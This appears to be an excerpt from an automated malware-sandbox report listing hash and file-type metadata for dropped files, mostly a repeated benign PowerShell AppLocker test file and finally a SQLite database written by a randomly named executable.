                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
